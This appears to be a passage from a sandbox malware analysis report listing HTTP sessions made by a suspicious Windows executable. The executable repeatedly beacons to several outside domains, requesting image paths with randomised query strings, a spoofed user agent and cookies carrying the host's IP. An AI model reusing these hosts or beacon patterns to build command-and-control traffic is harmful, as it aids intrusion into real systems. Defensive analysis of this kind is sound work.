                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:33.806544065 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:34.028702974 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:33 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:33 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  46192.168.2.94975854.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:34.578408003 CEST308OUTGET /images/xs.jpg?bc3818e=986810310 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159291|1720159259|3|9|0
                                  Jul 5, 2024 08:01:35.309993029 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:35 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159295|1720159259|3|10|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  47192.168.2.94975944.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:35.317998886 CEST299OUTGET /xs.jpg?c29ba9f=612184029 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159291|1720159259|3|9|0
                                  Jul 5, 2024 08:01:35.836908102 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:35 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159295|1720159259|3|10|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  48192.168.2.94976044.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:35.879831076 CEST303OUTGET /images/xs.jpg?c814e8b=1888207587 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159292|1720159260|3|9|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:36.407869101 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:36 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159296|1720159260|3|10|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  49192.168.2.94976178.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:36.422487020 CEST191OUTGET /xs.jpg?cd40c9d=1506564171 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:37.073223114 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:36 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  50192.168.2.94976237.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:37.124711037 CEST204OUTGET /images/xs2.jpg?d5ebd9e=2018814606 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:37.843856096 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:37 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  51192.168.2.94976337.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:37.982822895 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:38.693527937 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:38 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:38 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  52192.168.2.94976454.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:38.826477051 CEST311OUTGET /images/xs.jpg?e924854=-1850289336 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159295|1720159259|3|10|0
                                  Jul 5, 2024 08:01:39.556778908 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:39 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159299|1720159259|3|11|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  53192.168.2.94976544.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:39.564642906 CEST302OUTGET /xs.jpg?efa2e6a=-2033475142 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159295|1720159259|3|10|0
                                  Jul 5, 2024 08:01:40.164546967 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:40 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159300|1720159259|4|11|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  54192.168.2.94976644.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:40.362555027 CEST304OUTGET /images/xs.jpg?f75905a=1556177436 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159296|1720159260|3|10|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:40.857371092 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:40 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159300|1720159260|3|11|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  55192.168.2.94976778.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:40.865485907 CEST190OUTGET /xs.jpg?fbaba77=527791342 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:41.529639006 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:41 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  56192.168.2.94976837.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:41.547579050 CEST206OUTGET /images/xs2.jpg?1055bd73=-1828476661 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:42.282222986 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:42 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:42.286184072 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:42.509443045 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:42 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:42 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
